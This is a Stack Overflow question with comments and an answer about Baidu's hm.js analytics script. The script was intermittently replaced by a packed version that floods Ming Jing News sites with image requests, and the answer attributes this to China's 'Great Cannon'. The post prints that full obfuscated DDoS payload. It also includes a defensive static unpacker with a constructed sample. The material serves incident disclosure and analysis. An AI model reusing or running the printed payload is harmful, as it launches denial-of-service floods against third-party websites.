
Update:

It seems that different hm.js (Baidu TongJi JS library) are loaded. When no DDOS attack is observed, a standard hm.js is loaded; when there is a DDOS, a totally different hm.js is loaded. I am suspecting the Great Firewall of China is altering the code.

This is the hm.js that has been modified to launch DDOS:

// the following code launches DDOS against sites like mingjingnews.com

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    }
    ;
    if (!''.replace(/^/, String)) {
        while (c--)
            d[e(c)] = k[c] || e(c);
        k = [function(e) {
            return d[e]
        }
        ];
        e = function() {
            return '\\w+'
        }
        ;
        c = 1;
    }
    ;while (c--)
        if (k[c])
            p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
    return p;
}('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))

Compare this to the original hm.js code, where no DDOS is present.

Both of these 2 hm.js libraries are coming from the exact same address.

[Screenshot: Developer Console in Chrome]

I have a site that uses Baidu TongJi (Analytics). Like most other JavaScript libraries, it is done by injecting a line of JavaScript into the HTML.

// Loader for Baidu TongJi (Analytics): injects the hm.js script tag into the page
module.exports = function(id) {
    if (!id) {
        throw new Error('请填写百度统计id'); // "Please fill in the Baidu TongJi id"
    }
    var elm = document.createElement('script');
    // Protocol-relative URL: the script is fetched over whatever scheme the page uses (http or https)
    elm.src = '//hm.baidu.com/hm.js?' + id;
    var body = document.getElementsByTagName('body')[0];
    body.appendChild(elm);
}

To my horror, once it has initialised, my browser's console and network screen are flooded with around 3000+ network requests to Ming Jing News (fake news according to China's communist government) in just 100 seconds... and it kept going until I stopped it.

I am starting to think this is similar to the last time the great wall of China was used to launch attacks on GitHub using Baidu's CDN.

I am currently calling Baidu from outside of China and I am wondering if this is normal... Will the people inside China be spared from this?
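A defender's first step with a swapped hm.js like the one in the update is to see what the packed blob does without executing it. The following is an added example, not code from the question, from Baidu or from the payload itself: it statically undoes the eval(function(p,a,c,k,e,d){...}) wrapper shown above and lists the hosts and scheduling calls the recovered source contains. The SAMPLE string is constructed here in the same shape as the page's wrapper; it is not the real payload.

```javascript
// Static unpacker for the eval(function(p,a,c,k,e,d){...}) wrapper used by the
// swapped hm.js, followed by a small triage pass over the recovered source.
// Nothing is eval'd: the token dictionary is rebuilt and substituted by regex.

// Encode index n in the packer's base-a alphabet: 0-9, a-z, then A-Z for 36-61.
function encodeBase(n, a) {
  const lead = n < a ? '' : encodeBase(Math.floor(n / a), a);
  const r = n % a;
  return lead + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Rebuild the token -> word dictionary and substitute every word token in p.
function unpack(p, a, c, k) {
  const dict = Object.create(null);
  for (let i = 0; i < c; i++) dict[encodeBase(i, a)] = k[i] || encodeBase(i, a);
  return p.replace(/\b\w+\b/g, (tok) => (tok in dict ? dict[tok] : tok));
}

// Pull (p, a, c, k) out of the wrapper's call: }('...', 62, 101, '...'.split('|'), 0, {})
function parsePackedCall(src) {
  const m = /\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(src);
  if (!m) return null;
  const unescape = (s) => s.replace(/\\(['"\\])/g, '$1'); // handles \' \" \\ only
  return { p: unescape(m[1]), a: Number(m[2]), c: Number(m[3]), k: m[4].split('|') };
}

// Triage: which hosts the script embeds and whether it schedules repeated fetches.
function triage(src) {
  const args = parsePackedCall(src);
  const code = args ? unpack(args.p, args.a, args.c, args.k) : src;
  const urls = code.match(/https?:\/\/[^'"\s]+/g) || [];
  const hosts = [...new Set(urls.flatMap((u) => { try { return [new URL(u).hostname]; } catch { return []; } }))];
  const schedules = /\b(setInterval|setTimeout)\s*\(/.test(code);
  const loadsImages = /\bnew\s+Image\s*\(|createElement\(\s*['"]img['"]\s*\)/.test(code);
  return { packed: args !== null, code, hosts, schedules, loadsImages };
}

// Constructed sample in the same shape as the page's wrapper (not the real payload).
const SAMPLE = "eval(function(p,a,c,k,e,d){/* unpacker body omitted */}" +
  "('0 1=[\\'2://3.4/\\',\\'2://5.4/\\'];0 6=7;8 9(){0 a=b c();a.d=1[6++%1.e]}f(9,g)'," +
  "62,17,'var|list|http|a|example|b|i|0|function|hit|img|new|Image|src|length|setInterval|100'" +
  ".split('|'),0,{}))";

console.log(triage(SAMPLE));
```

The unescape step only covers the \' \" \\ escapes that appear in the page's blob; a wrapper that uses other JavaScript string escapes needs a full string-literal decoder before unpacking.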

  • Can you clarify what exactly your programming question is? – Cody Gray - on strike Aug 25 '17 at 14:35
  • @CodyGray Less on programming, more about internet security and the internet in China... and using Baidu services from outside of China? – williamli Aug 25 '17 at 14:38
  • Yeah, that was my concern (and some other users who flagged your question). Stack Overflow only deals with programming questions, so I'm not sure if this is a good fit for our site. It's obviously been an interesting question to a number of people, but I'm not sure where else it might be appropriate. – Cody Gray - on strike Aug 25 '17 at 14:45
  • @CodyGray Besides programming questions, I think network / security questions are also allowed here on Stack Overflow. Right now in the right sidebar, Stack Overflow is showing me related questions about Baidu / Google analytics, DDOS as well as a full category of "Hot Network Questions". – williamli Aug 25 '17 at 14:57
  • @williamli - the "related" questions are all programming related. The "hot network questions" are from other sites in the Stack Exchange network. Each of those sites covers different topics than Stack Overflow. For example, this is probably a better fit over on [IT Security](https://security.stackexchange.com) but it needs a clearer question first. While interesting, I don't really see an answerable question in this post. It's mostly just calling for speculation about who an unknown actor is and we'd just be guessing at that too. – AJ Henderson Aug 25 '17 at 15:01
  • The main problem I see with this question is understanding what is replacing the .js; it could be a whole bunch of reasons and hacks (could be your site being compromised and not an external provider)... hard to know/ensure/cross-validate. – Tensibai Aug 25 '17 at 15:02
  • @Tensibai It was not related to my site. I finally traced it down to the actual Baidu Analytics JS library that my site uses. From time to time, the code downloaded from their server will be completely different, with instructions to launch a DDOS attack on a number of sites. After a few refreshes, the JS library code will become normal again. I managed to copy down 2 versions of the hm.js served by the Baidu CDN. https://gist.github.com/williamli/223033fd95179d966fd2b4ce4543cfbb – williamli Aug 25 '17 at 15:06
  • @williamli The code you're downloading is different; I can't tell if I can be sure you're really downloading from Baidu's server or if your workstation is compromised in some way, where a botnet could override DNS information to make your browser get an attack lib instead (one of many ways, for the sake of example). – Tensibai Aug 25 '17 at 15:08
  • @Tensibai What do you think I can do to see where the attack came from? I can try and find the actual IP the code was pulled from. – williamli Aug 25 '17 at 15:10
  • @AJHenderson Let me try and update the question. – williamli Aug 25 '17 at 15:12
  • Is there a possibility of loading the js via https? Checking the SSL cert (and signing authority) for the provider of the information would allow tying it directly to Baidu, but without that, it could be anyone along the way. – AJ Henderson Aug 25 '17 at 15:12
  • @AJHenderson Good suggestion. Let me force it to use https and see. – williamli Aug 25 '17 at 15:13
  • I can't repro; I assume the id is specific to your site and the lib doesn't download without a valid one (I get 0 length responses only trying to download it). – Tensibai Aug 25 '17 at 15:16
  • @AJHenderson Right now everything seems fine. They only replace my hm.js (baidu) code from time to time and it seems they are not in attack mode right now. I will post back here once my code is being swapped again, and then I will try to get SSL / IP info and will try enforcing an https connection. – williamli Aug 25 '17 at 15:23

1 Answer

As suggested by a now deleted answer by kos, this is a (relatively) new form of attack employed by China. It was made famous by an attack on GitHub back in 2015. This form of attack is now known as "Great Cannon".

Details are available on Brian Krebs's security blog.

The Great Cannon
